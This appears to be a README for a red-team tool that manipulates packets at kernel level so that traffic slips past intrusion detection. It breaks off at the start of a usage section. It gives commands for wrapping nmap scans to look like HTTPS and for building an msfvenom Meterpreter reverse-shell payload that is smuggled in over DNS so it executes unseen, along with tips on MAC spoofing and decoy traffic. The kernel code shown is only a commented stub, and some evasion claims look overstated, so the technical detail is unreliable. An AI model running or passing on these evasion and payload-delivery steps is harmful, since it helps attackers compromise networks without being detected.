Flea Flicker NetFilter
Network Evasion for Red Teams
IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing.
Your pentest is over before it starts.
Flea Flicker manipulates packets at kernel level. Before they hit the network. Before IDS sees them.
Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious.
Manual control over packet behavior. Not automated evasion. Not script kiddie tools.
What It Does
Deep Packet Inspection Evasion
IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads.
Flea Flicker fragments your attack across multiple packets:
- Fragment payloads across multiple packets
- Encrypt at application layer before network layer
- Insert random padding between fragments
- Reassemble only at destination
Example:
Normal Metasploit payload:
[TCP Header][Exploit Code]
ā IDS sees exploit signature, blocks
Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
ā IDS sees incomplete fragments, allows
ā Target reassembles into exploit
Protocol Impersonation
Unusual protocols get flagged. Port scans detected immediately.
Make attack traffic look like legitimate services:
Example:
Nmap scan on port 445:
ā SMB enumeration detected, blocked
Flea Flicker wrapped Nmap:
ā Packets look like HTTPS traffic on 443
ā Payload hidden in TLS-like structure
ā IDS sees "normal web browsing"
ā Scan proceeds undetected
Timing Randomization
Behavioral analysis detects patterns. Regular intervals = automated scanning. You get caught.
Randomize everything:
- Random delays between packets (0.1s - 5s)
- Jitter injection (mimics human interaction)
- Volume throttling (stays under threshold)
What it defeats:
- Time-series analysis (looks for patterns)
- Rate limiting (stays under trigger threshold)
- Correlation engines (breaks temporal clustering)
MAC Address Rotation
Network access control. MAC filtering. Device tracking. They know your hardware.
Rotate and spoof:
- Rotate MAC every N packets
- Spoof vendor OUI (looks like different hardware)
- Maintain DHCP lease across rotations
Use case: Bypass MAC filtering on WiFi networks during pentest.
Traffic Mimicry
Volume analysis spots anomalies. Attack traffic doesn't look like normal users. You stand out.
Hide in normal traffic:
- Generate decoy traffic (legitimate-looking)
- Match volume patterns (office hours, usage spikes)
- Protocol diversity (HTTP, DNS, SMTP mixed)
Result: Real attack hidden in noise that looks like normal user.
Technical Implementation
Netfilter hooks (Linux kernel):
// Intercept outbound packets
nf_register_hook(&nfho_out, PF_INET, NF_INET_POST_ROUTING,
packet_handler, NF_IP_PRI_FIRST);
// Modify before sending
unsigned int packet_handler(void *priv, struct sk_buff *skb, ...) {
// Fragment payload
// Add encryption layer
// Inject timing delays
// Spoof headers
return NF_ACCEPT; // Send modified packet
}
Architecture:
[Application] ā [Payload]
ā
[Flea Flicker Interceptor]
ā
[Fragment + Encrypt + Obfuscate + Time Delay]
ā
[Modified Packets] ā [Network]
Real-World Scenario
Objective: Enumerate SMB shares on corporate network with IDS deployed.
Without Flea Flicker:
$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
ā IDS detects: Port scan + SMB enumeration
ā Alert triggered
ā IP blocked
ā Pentest detected
With Flea Flicker:
$ flea-flicker --mode ghost --protocol https \
nmap -p 445 --script smb-enum-shares 10.0.0.0/24
ā Packets fragmented across 20-second window
ā Traffic appears as HTTPS on port 443
ā Timing randomized (looks like browsing)
ā IDS sees: Normal web traffic
ā Scan completes undetected
ā Pentest proceeds
Pentest Integration
Metasploit payload wrapping:
# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin
# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
--protocol dns --fragment-size 64 --delay 0.5-3.0
# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes
Burp Suite extension:
[Burp Repeater]
ā
[Flea Flicker Proxy]
ā
[Obfuscated HTTP requests]
ā
[Target Web App]
WAF sees fragmented, time-delayed requests
Attack succeeds where direct request blocked
Nmap evasion:
# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com
# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
nmap -A -T2 target.com
Installation
# Clone repository
git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
# Install dependencies (requires root for netfilter)
sudo ./install.sh
# Load kernel module
sudo modprobe flea_flicker
# Verify installation
flea-flicker --version
Requirements:
- Linux kernel 4.15+ (netfilter support)
- Root access (kernel module loading)
- Python 3.8+ (control scripts)
- Compatible with: Kali, ParrotOS, Ubuntu, Debian
Basic Usage
Ghost Mode (DPI evasion):